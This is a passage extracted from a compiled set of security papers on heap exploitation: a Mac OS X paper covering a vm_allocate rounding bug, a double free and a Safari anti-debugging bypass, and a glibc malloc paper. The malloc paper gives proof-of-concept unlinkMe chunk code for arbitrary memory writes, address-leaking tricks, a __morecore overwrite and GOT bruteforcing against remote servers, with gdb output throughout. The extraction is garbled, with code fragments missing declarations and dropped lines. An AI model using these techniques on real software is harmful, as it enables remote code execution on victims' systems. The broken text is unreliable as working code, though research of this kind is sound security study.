use gdb to view the instructions in this function.
We can see in these instructions that the r11 register must be a valid
memory address. Other than that the final two instructions (0xd6874
and 0xd6878) move the value in the r12 register to the control
register, before branching to it. This is the equivalent of jumping to
a function pointer in r12. Amazingly this code construct is exactly
what we need.
Apple have been contacted about a couple of these bugs and are currently
in the process of fixing them.
The WebKit library is open source and available for download, apparently
it won't be too long before Nokia phones use this library for their web
applications. [5]
--[ 5 - Miscellaneous
Page
219
[6. OS X heap exploitation techniques - nemo]
The reason this works without failure is due to a subtle bug which
exists in the Darwin kernel's vm_allocate() function.
Here we can see that the page size minus one is simply added to the value
which is to be rounded before being bitwise AND'ed with the reverse of
the PAGE_MASK.
The effect of this macro when rounding large values can be illustrated
using the following code:
#include <stdio.h>
When run (below) it can be seen that the value 0xffffffff will be rounded
to 0.
-[nemo@gir:~]$ ./rounding
0x0
map_size = vm_map_round_page(size);
if (map_addr == 0)
map_addr += PAGE_SIZE;
The code below demonstrates the effect of this on two calls to malloc().
#include <stdio.h>
#include <stdlib.h>
return 0;
Page
220
[6. OS X heap exploitation techniques - nemo]
When this program is compiled and run (below) we can see that although the
programmer believes he/she now has a 4GB buffer only a single page has
been allocated.
-[nemo@gir:~]$ ./ovrflw
B - A: 0x1000
This means that most situations where a user specified length can be
passed to the malloc() function, before being used to copy data, are
exploitable.
if (!ptr) return;
This means that an address free()'ed twice (double free) will not
actually be free()'ed the second time. Making it hard to exploit
double free()'s in this way.
The small sample program below shows a pointer being allocated and
free()ed and then a second pointer being allocated of the same size. Then
free()ed twice.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
Page
221
[6. OS X heap exploitation techniques - nemo]
printf("a: %p\n",a);
free(a);
b = malloc(11);
printf("b: %p\n",b);
free(b);
printf("b: %p\n",a);
free(b);
printf("a: %p\n",a);
return 0;
}
When we compile and run it, as shown below, we can see that pointer "a"
still points to the same address as "b", even after it was free()'ed.
If this condition occurs and we are able to write to,or read from,
pointer "a", we may be able to exploit this for an info leak, or gain
control of execution.
-[nemo@gir:~]$ ./dfr
a: 0x500120
b: 0x500120
b: 0x500120
tst(3575) malloc: *** error for object 0x500120: double free
tst(3575) malloc: *** set a breakpoint in szone_error to debug
a: 0x500120
I have written a small sample program to explain more clearly how this
works. The code below reads a username and password from the user.
It then compares password to one stored in the file ".skrt". If this
password is the same, the secret code is revealed. Otherwise an error is
printed informing the user that the password was incorrect.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
printf("login: ");
fgets(user,128,stdin);
if (p = strchr(user,'\n'))
*p = '\x00';
Page
222
[6. OS X heap exploitation techniques - nemo]
goto exit;
}
exit:
if ((fp = fopen(PASSWDFILE,"r")) == NULL)
{
printf("Error loading password file.\n");
exit(1);
}
if (!fgets(skrt,128,fp))
{
exit(1);
}
if (p = strchr(skrt,'\n'))
*p = '\x00';
if (!strcmp(pass,skrt))
{
printf("The combination is 2C,4B,5C\n");
}
else
{
printf("Password Rejected for %s, please try
again\n");
user);
}
fclose(fp);
return 0;
}
When we compile the program and enter an incorrect password we see the
following message:
-[nemo@gir:~]$ ./dfree
login: nemo
Enter your password:
Password Rejected for nemo, please try again.
-[nemo@gir:~]$ ./dfree
login: admin_nemo
Admin user not allowed!
Password Rejected for secret_password, please try again.
-[nemo@gir:~]$ ./dfree
Page
223
[6. OS X heap exploitation techniques - nemo]
login: nemo
Enter your password:
The combination is 2C,4B,5C
Safari uses the ptrace() syscall to try and stop evil hackers from
debugging their proprietary code. ;). The extract from the
man-page below shows a ptrace() flag which can be used to stop people
being able to debug your code.
PT_DENY_ATTACH
This request is the other operation used by the traced
process; it allows a process that is not currently being
traced to deny future traces by its parent. All other
arguments are ignored. If the process is currently being
traced, it will exit with the exit status of ENOTSUP; oth-
erwise, it sets a flag that denies future traces. An
attempt by the parent to trace a process which has set this
flag will result in a segmentation violation in the parent.
There are a couple of ways to get around this check (which i am aware of).
The first of these is to patch your kernel to stop the PT_DENY_ATTACH call
from doing anything. This is probably the best way, however involves the
most effort.
The method which we will use now to look at Safari is to start up gdb and
put a breakpoint on the ptrace() function. This is shown below:
We then run the program, and wait until the breakpoint is hit. When our
breakpoint is triggered, we use the x/10i $pc command (below) to view the
next 10 instructions in the function.
(gdb) r
Starting program: /Applications/Safari.app/Contents/MacOS/Safari
Reading symbols for shared libraries .................... done
At line 0x90054204 we can see the instruction "sc" being executed. This
is the instruction which calls the syscall itself. This is similar to
int 0x80 on a Linux platform, or sysenter/int 0x2e in windows.
Page
224
[6. OS X heap exploitation techniques - nemo]
instruction. This way the syscall will never take place and we can
debug without any problems.
To patch this instruction in gdb we can use the command shown below and
continue execution.
--[ 6 - Conclusion
Although the technique which was described in this paper seem rather
specific, the technique is still valid and exploitation of heap bugs in
this way is definitely possible.
When you are able to exploit a bug in this way you can quickly turn a
complicated bug into the equivalent of a simple stack smash (3).
At the time of writing this paper, no protection schemes for the heap
exist for Mac OS X which would stop this technique from working. (To my
knowledge).
I'd like to say thanks to my boss Swaraj from Suresec LTD for giving me
time to research the things which i enjoy so much.
I'd also like to say hi to all the guys at Feline Menace, as well as
pulltheplug.org/#social and the Ruxcon team. I'd also like to thank the
Chelsea for providing the AU felinemenace guys with buckets of corona to
fuel our hacking. Thanks as well to duke for pointing out the vm_allocate()
bug and ilja for discussing all of this with me on various occasions.
--[ 7 - References
2) WebKit:
- http://webkit.opendarwin.org/
6) Darwin Source.
- http://www.opensource.apple.com/darwinsource/curr.version.number
7) Bug Me Not
- http://www.bugmenot.com
Page
225
[6. OS X heap exploitation techniques - nemo]
8) Open Darwin
- http://www.opendarwin.org
Page
226
[7. Advanced Doug lea's malloc exploits - jp]
1 -
Abstract
2 -
Introduction
3 -
Automating exploitation problems
4 -
The techniques
4.1 - aa4bmo primitive
4.1.1 - First unlinkMe chunk
4.1.1.1 - Proof of concept 1: unlinkMe chunk
4.1.2 - New unlinkMe chunk
4.2 - Heap layout analysis
4.2.1 - Proof of concept 2: Heap layout debugging
4.3 - Layout reset - initial layout prediction - server model
4.4 - Obtaining information from the remote process
4.4.1 - Modifying server static data - finding process' DATA
4.4.2 - Modifying user input - finding shellcode location
4.4.2.1 - Proof of concept 3 : Hitting the output
4.4.3 - Modifying user input - finding libc's data
4.4.3.1 - Proof of concept 4 : Freeing the output
4.4.4 - Vulnerability based heap memory leak - finding libc's DATA
4.5 - Abusing the leaked information
4.5.1 - Recognizing the arena
4.5.2 - Morecore
4.5.2.1 - Proof of concept 5 : Jumping with morecore
4.5.3 - Libc's GOT bruteforcing
4.5.3.1 - Proof of concept 6 : Hinted libc's GOT bruteforcing
4.5.4 - Libc fingerprinting
4.5.5 - Arena corruption (top, last remainder and bin modification)
4.6 - Copying the shellcode 'by hand'
5 - Conclusions
6 - Thanks
7 - References
---------------------------------------------------------------------------
--[ 1. Abstract
This paper details several techniques that allow more generic and reliable
exploitation of processes that provide us with the ability to overwrite
an almost arbitrary 4 byte value at any location.
Higher level techniques will be constructed on top of the unlink() basic
technique (presented in MaXX's article [2]) to exploit processes which
allow an attacker to corrupt Doug Lea's malloc (Linux default's dynamic
memory allocator).
unlink() is used to force specific information leaks of the target process
memory layout. The obtained information is used to exploit the target
without any prior knowledge or hardcoded values, even when randomization
of main object's and/or libraries' load address is present.
Page
227
[7. Advanced Doug lea's malloc exploits - jp]
---------------------------------------------------------------------------
--[ 2. Introduction
malloc higher
vulnerability -> structures -> primitive -> level
corruption techniques
---------------------------------------------------------------------------
heap overflow unlink() freeing the output
double free() -> technique -> aa4bmo -> hitting the output
... cushion chunk
...
This paper focuses mainly on the question that arises after we reach the
aa4bmo primitive: what should we do once we know a process allows us to
overwrite four bytes of its memory with almost any arbitrary data?
In addition, tips to reach the aa4bmo primitive in a reliable way are
explained.
Page
228
[7. Advanced Doug lea's malloc exploits - jp]
---------------------------------------------------------------------------
--] 3. Automating exploitation problems
When trying to answer the question 'what should we do once we know we can
overwrite four bytes of the process memory with almost any arbitrary
data?', we face several problems:
A] how can we be sure we are overwriting the desired bytes with the
desired bytes?
As the aa4bmo primitive is the underlying layer that allows us to
implement the higher level techniques, we need to be completely sure it is
working as expected, even when we know we won't know where our data will
be located. Also, in order to be useful, the primitive should not crash
the exploited process.
Typical exploits are target based, hardcoding at least one of the values
required for exploitation, such as the address of a given GOT entry,
depending on the targeted daemon version and the Linux distribution and
release version. Although this simplifies the exploitation process, it is
not always feasible to obtain the required information (i.e. a server can
be configured to lie or to not disclose its version number). Besides, we
may not have the needed information for the target. Bruteforcing more than
one exploit parameter may not always be possible, if each of the values
can't be obtained separately.
There are some well known techniques used to improve the reliability
(probability of success) of a given exploit, but they are only an aid for
improving the exploitation chances. For example, we may pad the shellcode
with more nops, we may also inject a larger quantity of shellcode in the
process (depending on the process being exploited) inferring there are
more possibilities of hitting it that way. Although these enhancements
will improve the reliability of our exploit, they are not enough for an
exploit to work always on any vulnerable target. In order to create a
fully reliable exploit, we'll need to obtain both the address where our
shellcode gets injected and the address of any function pointer to
overwrite.
Page
229
[7. Advanced Doug lea's malloc exploits - jp]
---------------------------------------------------------------------------
--] 4. The techniques
We just need a free() call to hit our block after the (X) point to
overwrite 'where' with 'what'.
- chunk_free() tries to look for the next chunk, it takes the chunk's
size (<0) and adds it to the chunk address, obtaining always the sizeA
of the 'nasty chunk' as the start of the next chunk, as all the sizes
after the (X) are relative to it.
- Then, it checks the prev_inuse bit of our chunk, but as we set it (each
of the sizes after the (X) point has the prev_inuse bit set, the
IS_MMAPPED bit is not set) it does not try to backward consolidate
(because the previous chunk 'seems' to be allocated).
- Finally, it checks if the fake next chunk (our nasty chunk) is free. It
takes its size (-4) to look for the next chunk, obtaining our fake
sizeB, and checks for the prev_inuse flag, which is not set. So, it
tries to unlink our nasty chunk from its bin to coalesce it with the
chunk being freed.
We'll use the following code to show in a simple way the unlinkMe chunk in
action:
Page
230
[7. Advanced Doug lea's malloc exploits - jp]
int i = 0;
unlinkMe[i++] = -4;
unlinkMe[i++] = -4;
unlinkMe[i++] = WHAT_2_WRITE;
unlinkMe[i++] = WHERE_2_WRITE-8;
for(;i<SZ;i++){
unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ;
}
free(unlinkMe+SOMEOFFSET);
return 0;
}
(gdb) s
chunk_free (ar_ptr=0x40018040, p=0x8049874) at heapy.c:3221
(gdb) x/20x p
0x8049874: 0xfffffd71 0xfffffd6d 0xfffffd69 0xfffffd65
0x8049884: 0xfffffd61 0xfffffd5d 0xfffffd59 0xfffffd55
0x8049894: 0xfffffd51 0xfffffd4d 0xfffffd49 0xfffffd45
0x80498a4: 0xfffffd41 0xfffffd3d 0xfffffd39 0xfffffd35
0x80498b4: 0xfffffd31 0xfffffd2d 0xfffffd29 0xfffffd25
(gdb) p/x hd
$5 = 0xfffffd6d
(gdb) p/x sz
$6 = 0xfffffd6c
Using the negative relative size, chunk_free() gets the next chunk, let's
see which is the 'next' chunk:
Page
231
[7. Advanced Doug lea's malloc exploits - jp]
3296 sz += nextsz;
3298 if (!islr && next->fd == last_remainder(ar_ptr))
3306 unlink(next, bck, fwd);
The chunk was inserted into one of the bigger bins... as a consequence of
its 'negative' size.
The process won't crash if we are able to maintain this state. If more
calls to free() hit our chunk, it won't crash. But it will crash in case a
malloc() call does not find any free chunk to satisfy the allocation
requirement and tries to split one of the bins in the bin number 126, as
it will try to calculate where is the chunk after the fake one, getting
out of the valid address range because of the big 'negative' size (this
may not happen in a scenario where there is enough memory allocated
between the fake chunk and the top chunk, forcing this layout is not very
difficult when the target server does not impose tight limits to our
requests size).
!!!!!!!!!! !!!!!!!!!!
0xbfffff00: 0xbfffff00 0x414c0065 0x653d474e 0xbffffef8
0xbfffff10: 0x6f73692e 0x39353838 0x53003531 0x415f4853
0xbfffff20: 0x41504b53 0x2f3d5353 0x2f727375 0x6562696c
Page
232
[7. Advanced Doug lea's malloc exploits - jp]
for(i=0;i<5;i++) free(unlinkMe+SOMEOFFSET);
to:
This makes our previous unlinkMe chunk to fail in two different points in
systems using a newer libc.
public_fREe(Void_t* mem)
{
...
ar_ptr = arena_for_chunk(p);
...
_int_free(ar_ptr, mem);
...
where:
#define arena_for_chunk(ptr) \
(chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena)
and
Page
233
[7. Advanced Doug lea's malloc exploits - jp]
So, the fake chunk size has to have its NON_MAIN_ARENA flag not set.
Then, our second problem takes places when the supplied size is masked
with the SIZE_BITS. Older code looked like this:
nextsz = chunksize(next);
0x400152e2 <chunk_free+64>: mov 0x4(%edx),%ecx
0x400152e5 <chunk_free+67>: and $0xfffffffc,%ecx
nextsize = chunksize(nextchunk);
0x42073fe0 <_int_free+112>: mov 0x4(%ecx),%eax
0x42073fe3 <_int_free+115>: mov %ecx,0xffffffec(%ebp)
0x42073fe6 <_int_free+118>: mov %eax,0xffffffe4(%ebp)
0x42073fe9 <_int_free+121>: and $0xfffffff8,%eax
So, we can't use -4 anymore, the smaller size we can provide is -8.
Also, we are not able anymore to make every chunk to point to our nasty
chunk. The following code shows our new unlinkMe chunk which solves both
problems:
if(sz<13) sz = 13;
unlinkMe=(unsigned long*)malloc(sz*sizeof(unsigned long));
// 1st nasty chunk
unlinkMe[i++] = -4; // PREV_INUSE is not set
unlinkMe[i++] = -4;
unlinkMe[i++] = -4;
Page
234
[7. Advanced Doug lea's malloc exploits - jp]
unlinkMe[i++] = what;
unlinkMe[i++] = where-8;
// 2nd nasty chunk
unlinkMe[i++] = -4; // PREV_INUSE is not set
unlinkMe[i++] = -4;
unlinkMe[i++] = -4;
unlinkMe[i++] = what;
unlinkMe[i++] = where-8;
for(;i<sz;i++)
if(i%2)
// relative negative offset to 1st nasty chunk
unlinkMe[i] = ((-(i-8) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) |
PREV_INUSE;
else
// relative negative offset to 2nd nasty chunk
unlinkMe[i] = ((-(i-3) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) |
PREV_INUSE;
free(unlinkMe+SOMEOFFSET(sz));
return unlinkMe;
}
The process is similar to the previously explained for the first unlinkMe
chunk version. Now, we are using two nasty chunks, in order to be able to
point every chunk to one of them. Also, we added a -4 (PREV_INUSE flag not
set) before each of the nasty chunks, which is accessed in step 3 of the
'4.1.1 First unlinkMe chunk' section, as -8 is the smaller size we can
provide.
This new version of the unlinkMe chunk works both in older and newer libc
versions. Along the article most proof of concept code uses the first
version, replacing the aa4bmoPrimitive() function is enough to obtain an
updated version.
---------------------------------------------------------------------------
--] 4.2 Heap layout analysis
Page
235
[7. Advanced Doug lea's malloc exploits - jp]
A] chunk size: does the process allocate big memory chunks? is our
input stored in the heap? what commands are stored in the heap?
is there any size limit to our input? am I able to force a heap
top (top_chunk) extension?
B] allocation behavior: are chunks allocated for each of our
connections? what size? are chunks allocated periodically? are
chunks freed periodically? (i.e. async garbage collector, cache
pruning, output buffers, etc)
C] heap holes: does the process leave holes? when? where? what size?
can we fill the hole with our input? can we force the overflow
condition in this hole? what is located after the hole? are we
able to force the creation of holes?
D] original heap layout: is the heap layout predictable after process
initialization? after accepting a client connection? (this is
related to the server mode)
static void
#if __STD_C
heap_dump(arena *ar_ptr)
#else
heap_dump(ar_ptr) arena *ar_ptr;
#endif
{
mchunkptr p;
fprintf(stderr,"sbrk_base %p\n",
(mchunkptr)(((unsigned long)sbrk_base + MALLOC_ALIGN_MASK) &
~MALLOC_ALIGN_MASK));
for(;;) {
fprintf(stderr, "chunk %p 0x%.4x", p, (long)p->size);
if(p == top(ar_ptr)) {
fprintf(stderr, " (T)\n");
break;
} else if(p->size == (0|PREV_INUSE)) {
fprintf(stderr, " (Z)\n");
break;
}
if(inuse(p))
fprintf(stderr," (A)");
Page
236
[7. Advanced Doug lea's malloc exploits - jp]
else
fprintf(stderr," (F) | 0x%8x | 0x%8x |",p->fd,p->bk);
if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr)))
fprintf(stderr," (LR)");
else if(p->fd==p->bk & ~inuse(p))
fprintf(stderr," (LC)");
fprintf(stderr,"\n");
p = next_chunk(p);
}
fprintf(stderr,"sbrk_end %p\n",sbrk_base+sbrked_mem);
}
static void
#if __STD_C
heap_layout(arena *ar_ptr)
#else
heap_layout(ar_ptr) arena *ar_ptr;
#endif
{
mchunkptr p;
for(;;p=next_chunk(p)) {
if(p==top(ar_ptr)) {
fprintf(stderr,"|T|\n\n");
break;
}
if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr))) {
fprintf(stderr,"|L|");
continue;
}
if(inuse(p)) {
fprintf(stderr,"|A|");
continue;
}
fprintf(stderr,"|%lu|",bin_index(p->size));
continue;
}
}
}
static void
#if __STD_C
bin_dump(arena *ar_ptr)
#else
bin_dump(ar_ptr) arena *ar_ptr;
#endif
{
int i;
mbinptr b;
mchunkptr p;
Page
237
[7. Advanced Doug lea's malloc exploits - jp]
(void)mutex_lock(&ar_ptr->mutex);
We'll use the following code to show how the debug functions help to
analyse the heap layout:
#include <malloc.h>
int main(void){
void *curly,*larry,*moe,*po,*lala,*dipsi,*tw,*piniata;
curly = malloc(256);
larry = malloc(256);
moe = malloc(256);
po = malloc(256);
lala = malloc(256);
free(larry);
free(po);
tw = malloc(128);
piniata = malloc(128);
dipsi = malloc(1500);
free(dipsi);
free(lala);
}
We override the real malloc with our debugging functions, heapy.so also
includes the heap layout dumping functions.
(gdb) r
Starting program: /home/jp/cerebro/heapy/debugging_sample
4 curly = malloc(256);
Page
238
[7. Advanced Doug lea's malloc exploits - jp]
(gdb) p heap_dump(0x40018040)
(gdb) p bin_dump(0x40018040)
(gdb) p heap_layout(0x40018040)
The first chunk is allocated, note the difference between the requested
size (256 bytes) and the size passed to chunk_alloc(). As there is no
chunk, the top needs to be extended and memory is requested to the
operating system. More memory than the needed is requested, the remaining
space is allocated to the 'top chunk'.
In the heap_dump()'s output the (A) represents an allocated chunk, while
the (T) means the chunk is the top one. Note the top chunk's size (0x961)
has its last bit set, indicating the previous chunk is allocated:
/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use
*/
5 larry = malloc(256);
Page
239
[7. Advanced Doug lea's malloc exploits - jp]
A new chunk is allocated from the remaining space at the top chunk. The
same happens with the next malloc() calls.
6 moe = malloc(256);
7 po = malloc(256);
8 lala = malloc(256);
Page
240
[7. Advanced Doug lea's malloc exploits - jp]
9 free(larry);
[1679] FREE(0x80496a8) - CHUNK_FREE(0x40018040,0x80496a0)
fronlink(0x80496a0,264,33,0x40018148,0x40018148) new free chunk
A chunk is freed. The frontlink() macro is called to insert the new free
chunk into the corresponding bin:
Note the arena address parameter (ar_ptr) was omitted in the output.
In this case, the chunk at 0x80496a0 was inserted in the bin number 33
according to its size. As this chunk is the only one in its bin (we can
check this in the bin_dump()'s output), it's a lonely chunk (LC) (we'll
see later that being lonely makes 'him' dangerous...), its
bk and fd pointers are equal and point to the bin number 33.
In the heap_layout()'s output, the new free chunk is represented by the
number of the bin where it is located.
10 free(po);
Page
241
[7. Advanced Doug lea's malloc exploits - jp]
Now, we have two free chunks in the bin number 33. We can appreciate now
how the double linked list is built. The forward pointer of the chunk at
0x80498b0 points to the other chunk in the list, the backward pointer
points to the list head, the bin.
Note that there is no longer a lonely chunk. Also, we can see the
difference between a heap address and a libc address (the bin address),
0x080496a0 and 0x40018148 respectively.
11 tw = malloc(128);
Page
242
[7. Advanced Doug lea's malloc exploits - jp]
In this case, the requested size for the new allocation is smaller than
the size of the available free chunks. So, the first freed buffer is taken
from the bin with the unlink() macro and splitted. The first part is
allocated, the remaining free space is called the 'last remainder', which
is always stored in the first bin, as we can see in the bin_dump()'s
output.
In the heap_layout()'s output, the last remainder chunk is represented
with a L; in the heap_dump()'s output, (LR) is used.
12 piniata = malloc(128);
As the last_remainder size is not enough for the requested allocation, the
last remainder is cleared and inserted as a new free chunk into the
corresponding bin. Then, the other free chunk is taken from its bin and
split as in the previous step.
13 dipsi = malloc(1500);
Page
243
[7. Advanced Doug lea's malloc exploits - jp]
14 free(dipsi);
The chunk next to the top chunk is freed, so it gets coalesced with it,
and it is not inserted in any bin.
Page
244
[7. Advanced Doug lea's malloc exploits - jp]
15 free(lala);
Again, but this time also the chunk before the freed chunk is coalesced, as
it was already free.
---------------------------------------------------------------------------
--] 4.3 - Layout reset - initial layout prediction - server model
Page
245
[7. Advanced Doug lea's malloc exploits - jp]
shot so, for example, bruteforcing and/or 'heap reset' can't be applied.
---------------------------------------------------------------------------
--] 4.4 Obtaining information from the remote process
This technique was originally seen in wuftpd ~{ exploits. When the ftpd
process receives a 'help' request, answers with all the available commands.
These are stored in a table which is part of the process' DATA, being a
static structure. The attacker tries to overwrite part of the structure,
and using the 'help' command until he sees a change in the server's answer.
Now the attacker knows an absolute address within the process' DATA, being
able to predict the location of the process' GOT.
The following technique allows the attacker to find the exact location of
the injected shellcode within the process' address space, being
independent of the target process.
To obtain the address, the attacker provides the process with some bogus
data, which is stored in some part of the process. Then, the basic
primitive is used, trying to write 4 bytes in the location the bogus
data was previously stored. After this, the server is forced to reply
using the supplied bogus data.
If the replayed data differs from the original supplied (taken into account
any transformation the server may perform on our input), we can be sure
that next time we send the same input sequence to the server, it will be
stored in the same place. The server's answer may be truncated if a
function expecting NULL terminating strings is used to craft it, or to
obtain the answer's length before sending it through the network.
In fact, the provided input may be stored multiple times in different
locations, we will only detect a modification when we hit the location
where the server reply is crafted.
Note we are able to try two different addresses for each connection,
speeding up the bruteforcing mechanism.
The main requirement needed to use this trick, is being able to trigger
the aa4bmo primitive between the time the supplied data is stored and the
time the server's reply is built. Understanding the process allocation
behavior, including how is processed each available input command is
needed.
#include <stdio.h>
#define SZ 256
#define SOMEOFFSET 5 + (rand() % (SZ-1))
#define PREV_INUSE 1
Page
246
[7. Advanced Doug lea's malloc exploits - jp]
#define IS_MMAP 2
#define OUTPUTSZ 1024
for(contador=1;argv[contador]!=NULL;contador++){
where = strtol(argv[contador], (char **)NULL, 16);
printf("[.] trying %p\n",where);
aa4bmoPrimitive(where,where);
for(i=0;i<OUTPUTSZ;i++)
if(output[i] != 'O'){
printf("(!) you found the output @ %p :(\n",where);
printf("[%s]\n",output);
return 0;
}
printf("(-) output was not @ %p :P\n",where);
}
printf("(x) did not find the output <:|\n");
}
Page
247
[7. Advanced Doug lea's malloc exploits - jp]
For example, in the CVS 'Directory' double free exploit [7], unrecognized
commands (i.e. 'cucucucucu') are used to populate the server heap. The
server does not answer, just stores the provided data in the heap, and
waits, until a noop or a command is received. After that, the unrecognized
command that was sent is sent back without any modification to the client.
We can provide the server with data almost without any size restriction,
this data is stored in the heap, until we force it to be replayed to us.
However, analysing how our unrecognized command is stored in the heap we
find that, instead of what we expected (a single memory chunk with our
data), there are other structures mixted with our input:
This happens because error messages are buffered when generated, waiting
to be flushed, some buffering state internal structures get allocated,
and our data is split and stored in fixed size error buffers.
Page
248
[7. Advanced Doug lea's malloc exploits - jp]
The user provides as input a 'cushion chunk' to the target process. free()
is called in any part of our input, so our especially crafted chunk is
inserted in one of the last bins (we may know it's empty from the heap
analysis stage, avoiding then a process crash). When the provided cushion
chunk is inserted into the bin, the bin's address is written in the fd and
bk fields of the chunk's header.
#include <stdio.h>
#define SZ 256
#define SOMEOFFSET 5 + (rand() % (SZ-1))
#define PREV_INUSE 1
#define IS_MMAP 2
Page
249
[7. Advanced Doug lea's malloc exploits - jp]
./freeOutput
Page
250
[7. Advanced Doug lea's malloc exploits - jp]
After the frontlink() macro is called with our supplied buffer, it gets
the address of the bin in which it is inserted:
(gdb) x/20x p
(gdb) c
Continuing.
(-) looking for bin address...
(!) found bin address -> 0x40018430
Although in this example we hit the cushion chunk in the first try on
purpose, this technique can be applied to brute force the location of our
output buffer also at the same time (if we don't know it beforehand).
--] 4.4.4 Vulnerability based heap memory leak - finding libc's data
---------------------------------------------------------------------------
--] 4.5 Abusing the leaked information
Page
251
[7. Advanced Doug lea's malloc exploits - jp]
The idea is to get from the previously gathered information, the address
of a malloc's bin. This applies mainly to scenarios were we are able to
leak process heap memory. A bin address can be directly obtained if the
attacker is able to use the 'freeing the output' technique.
The obtained bin address can be used later to find the address of a
function pointer to overwrite with the address of our shellcode, as shown
in the next techniques.
.
.
.
[bin_X]
ptr] ----> [<- fd
[ lonely but interesting chunk
ptr] ----> [<- bk
.
.
Then, we can look for two equal memory addresses, one next to the
other, pointing to libc's memory (looking for addresses of
the form 0x4....... is enough for our purpose). We can suppose these
pairs of addresses we found are part of a free chunk which is the only
one hanging of a bin, we know it looks like...
size | fd | bk
[ ptr_2_libc's_memory | ptr_2_process'_heap ]
or
Page
252
[7. Advanced Doug lea's malloc exploits - jp]
[ ptr_2_process'_heap | ptr_2_libc's_memory ]
We must take into account that this heuristic will not be as accurate
as searching for a pair of equal pointers to libc's space address, but
as we already said, it's possible to cross-check between multiple possible
chunks.
Finally, we must remember this depends totally on the way we are
abusing the process to read its memory. In case we can read arbitrary
addresses of memory, this is not an issue, the problem gets harder
as more limited is our mechanism to retrieve remote memory.
Here, we show how to find a function pointer within the libc after
obtaining a malloc bin address, using one of the before explained
mechanisms.
Using the size field of the retrieved chunk header and the bin_index() or
smallbin_index() macro we obtain the exact address of the main_arena.
We can cross check between multiple supposed lonely chunks that the
main_arena address we obtained is the real one, depending on the
quantity of lonely chunks pairs we'll be more sure. As long as the
process doesn't crash, we may retrieve heap memory several times, as
main_arena won't change its location. Moreover, I think it
wouldn't be wrong to assume main_arena is located in the same address
across different processes (this depends on the address on which the
libc is mapped). This may even be true across different servers
processes, allowing us to retrieve the main_arena through a leak in a
process different from the one being actively exploited.
Page
253
[7. Advanced Doug lea's malloc exploits - jp]
MORECORE() is called from the malloc() algorithm to extend the memory top,
requesting the operating system via the sbrk.
/* Try to extend */
malloc_extend_top(ar_ptr, nb);
We just need to sit and wait until the code reaches any of these points.
In some cases it may be necessary to arrange things in order to avoid the
code crashing before.
The morecore function pointer is called each time the heap needs to be
extended, so forcing the process to allocate a lot of memory is
recommended after overwriting the pointer.
In case we are not able to avoid a crash before taking control of the
process, there's no problem (unless the server dies completely), as we can
expect the libc to be mapped in the same address in most cases.
The following code just shows to get the required information from a
freed chunk, calculates the address of __morecore and forces a call
to MORECORE() after having overwritten it.
Let's look what happened with gdb, we'll also be using a simple
modified malloc in the form of a shared library to know what is
going on inside malloc's internal structures.
Page
254
[7. Advanced Doug lea's malloc exploits - jp]
Note we call malloc() again with another pointer, letting this aux
pointer be the chunk next to the top_chunk... to avoid the
differences in the way it is handled when freed with our purposes
(remember in this special case the chunk would be coalesced with the
top_chunk without getting linked to any bin):
Page
255
[7. Advanced Doug lea's malloc exploits - jp]
The chunk was freed and inserted into some bin... which was empty as
this was the first chunk freed. So this is a 'lonely chunk', the
only chunk in one bin.
Here we can see both bk and fd pointing to the same address in
libc's memory, let's see how the main_arena looks like now:
Note the completely just initialized main_arena with all its bins
pointing to themselves, and the just added free chunk to one of the
bins...
Page
256
[7. Advanced Doug lea's malloc exploits - jp]
Using the known size of the chunk, we know in which bin it was
placed, so we can get main_arena's address and, finally, __morecore.
Page
257
[7. Advanced Doug lea's malloc exploits - jp]
(gdb) bt
#0 0x41414141 in ?? ()
#1 0x4207a148 in malloc () from /lib/i686/libc.so.6
#2 0x0804869d in main (argc=1, argv=0xbffffad4) at heapy.c:52
#3 0x42017589 in __libc_start_main () from /lib/i686/libc.so.6
(gdb) frame 1
#1 0x4207a148 in malloc () from /lib/i686/libc.so.6
(gdb) x/i $pc-0x5
0x4207a143 <malloc+195>: call 0x4207a2f0 <chunk_alloc>
(gdb) disass chunk_alloc
Dump of assembler code for function chunk_alloc:
...
0x4207a8ac <chunk_alloc+1468>: mov 0x64c(%ebx),%eax
0x4207a8b2 <chunk_alloc+1474>: sub $0xc,%esp
0x4207a8b5 <chunk_alloc+1477>: push %esi
0x4207a8b6 <chunk_alloc+1478>: call *(%eax)
#include <stdio.h>
#include <stdlib.h>
free(chunk);
printf("(-) lonely chunk was freed, gathering information...\n");
Page
258
[7. Advanced Doug lea's malloc exploits - jp]
fd = chunk[0];
bk = chunk[1];
arena = bk-bin*2*sizeof(void*);
printf("\t(!) &main_arena[0] @ 0x%X\n",arena);
morecore = arena-32;
printf("\t(!) __morecore @ 0x%X\n",morecore);
return 7;
}
In case the morecore trick doesn't work (we can try, as just requires
one try), meaning probably that our target is using a newer libc, we
still have the obtained glibc's bin address. We know that above that
address is going to be located the glibc's GOT.
We just need to bruteforce upwards until hitting any entry of a going to
be called libc function. This bruteforce mechanism may take a while, but
not more time that should be needed to bruteforce the main object's GOT
(in case we obtained its aproximate location some way).
To speed up the process, the bruteforcing start point should be obtained
by adjusting the retrieved bin address with a fixed value. This value
should be enough to avoid corrupting the arena to prevent crashing the
process. Also, the bruteforcing can be performed using a step size bigger
than one. Using a higher step value will need a less tries, but may miss
the GOT. The step size should be calculated considering the GOT size and
the number of GOT entries accesses between each try (if a higher number
of GOT entries are used, it's higher the probability of modifying an entry
that's going to be accessed).
Page
259
[7. Advanced Doug lea's malloc exploits - jp]
Note the bruteforcing mechanism may crash the process in several ways, as
it is corrupting libc data.
The libc's GOT bruteforcing idea was successfully tested in Redhat 8.0,
Redhat 7.2 and Redhat 7.1 default installations.
